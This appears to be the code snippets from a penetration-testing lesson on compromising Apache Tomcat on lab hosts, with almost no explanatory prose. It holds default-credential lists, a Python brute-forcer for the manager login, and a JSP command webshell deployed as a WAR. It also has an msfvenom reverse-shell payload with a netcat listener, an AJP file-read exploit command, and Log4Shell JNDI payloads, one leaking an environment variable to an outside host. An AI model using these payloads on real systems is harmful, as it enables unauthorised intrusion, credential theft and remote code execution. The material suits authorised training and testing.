Copy $ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
<SNIP>
Copy < SNIP >
!-- user manager can access only manager section -->
< role rolename = "manager-gui" />
< user username = "tomcat" password = "tomcat" roles = "manager-gui" />
<!-- user admin can access manager and admin section both -->
< role rolename = "admin-gui" />
< user username = "admin" password = "admin" roles = "manager-gui,admin-gui" />
</ tomcat-users >
Copy gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
Copy osboxes@osboxes:~$ creds search tomcat
+----------------------------------+------------+------------+
| Product | username | password |
+----------------------------------+------------+------------+
| apache tomcat host manager (web) | admin | admin |
| apache tomcat host manager (web) | ADMIN | ADMIN |
| apache tomcat host manager (web) | admin | <blank> |
| apache tomcat host manager (web) | admin | j5Brn9 |
| apache tomcat host manager (web) | admin | tomcat |
| apache tomcat host manager (web) | cxsdk | kdsxc |
| apache tomcat host manager (web) | j2deployer | j2deployer |
| apache tomcat host manager (web) | ovwebusr | OvW*busr1 |
| apache tomcat host manager (web) | QCC | QLogic66 |
| apache tomcat host manager (web) | role1 | role1 |
| apache tomcat host manager (web) | role1 | tomcat |
| apache tomcat host manager (web) | role | changethis |
| apache tomcat host manager (web) | root | root |
| apache tomcat host manager (web) | tomcat | changethis |
| apache tomcat host manager (web) | tomcat | s3cret |
| apache tomcat host manager (web) | tomcat | tomcat |
| apache tomcat host manager (web) | xampp | xampp |
+----------------------------------+------------+------------
Copy cat /opt/tools/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
j2deployer j2deployer
ovwebusr OvW*busr1
cxsdk kdsxc
root owaspbwa
ADMIN ADMIN
xampp xampp
tomcat s3cret
QCC QLogic66
admin vagrant
admin password
admin
admin Password1
admin password1
admin admin
admin tomcat
both tomcat
manager manager
role1 role1
role1 tomcat
role changethis
root Password1
root changethis
root password
root password1
root r00t
root root
root toor
tomcat tomcat
tomcat password1
tomcat password
tomcat
tomcat admin
tomcat changethis Tomcat Manager - Login Brute Force
Copy msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58
Copy #!/usr/bin/python
import requests
from termcolor import cprint
import argparse
parser = argparse . ArgumentParser (description = "Tomcat manager or host-manager credential bruteforcing" )
parser . add_argument ( "-U" , "--url" , type = str , required = True , help = "URL to tomcat page" )
parser . add_argument ( "-P" , "--path" , type = str , required = True , help = "manager or host-manager URI" )
parser . add_argument ( "-u" , "--usernames" , type = str , required = True , help = "Users File" )
parser . add_argument ( "-p" , "--passwords" , type = str , required = True , help = "Passwords Files" )
args = parser . parse_args ()
url = args . url
uri = args . path
users_file = args . usernames
passwords_file = args . passwords
new_url = url + uri
f_users = open (users_file, "rb" )
f_pass = open (passwords_file, "rb" )
usernames = [x . strip () for x in f_users]
passwords = [x . strip () for x in f_pass]
cprint ( "\n[+] Atacking....." , "red" , attrs = [ 'bold' ])
for u in usernames :
for p in passwords :
r = requests . get (new_url,auth = (u, p))
if r . status_code == 200 :
cprint ( "\n[+] Success!!" , "green" , attrs = [ 'bold' ])
cprint ( "[+] Username : {} \n[+] Password : {} " . format (u,p), "green" , attrs = [ 'bold' ])
break
if r . status_code == 200 :
break
if r . status_code != 200 :
cprint ( "\n[+] Failed!!" , "red" , attrs = [ 'bold' ])
cprint ( "[+] Could not Find the creds :( " , "red" , attrs = [ 'bold' ])
#print r.status_code
Copy $ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
[+] Atacking.....
[+] Success!!
[+] Username : b'tomcat'
[+] Password : b'admin' Tomcat Manager - WAR File Upload
Copy <% @ page import = "java.util.*,java.io.*" %>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
< HTML >< BODY >
<FORM METHOD = "GET" NAME = "myform" ACTION = "" >
<INPUT TYPE = "text" NAME = "cmd" >
<INPUT TYPE = "submit" VALUE = "Send" >
</ FORM >
< pre >
<%
if ( request . getParameter ( "cmd" ) != null ) {
out . println ( "Command: " + request . getParameter ( "cmd" ) + "<BR>" );
Process p = Runtime . getRuntime () . exec ( request . getParameter ( "cmd" ));
OutputStream os = p . getOutputStream ();
InputStream in = p . getInputStream ();
DataInputStream dis = new DataInputStream(in) ;
String disr = dis . readLine ();
while ( disr != null ) {
out . println (disr);
disr = dis . readLine ();
}
}
%>
</ pre >
</ BODY ></ HTML >
Copy $ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp
adding: cmd.jsp (deflated 81%)
Copy $ curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
</pre>
</BODY></HTML>
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
Copy nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 45224
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
Copy nmap -sV -p 8009,8080 app-dev.inlanefreight.local
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
Copy python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
Copy ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} - AWS Firewall Bypass
${jndi:ldap://${env:user}.xyz.collab.com/a} - Default Payload 
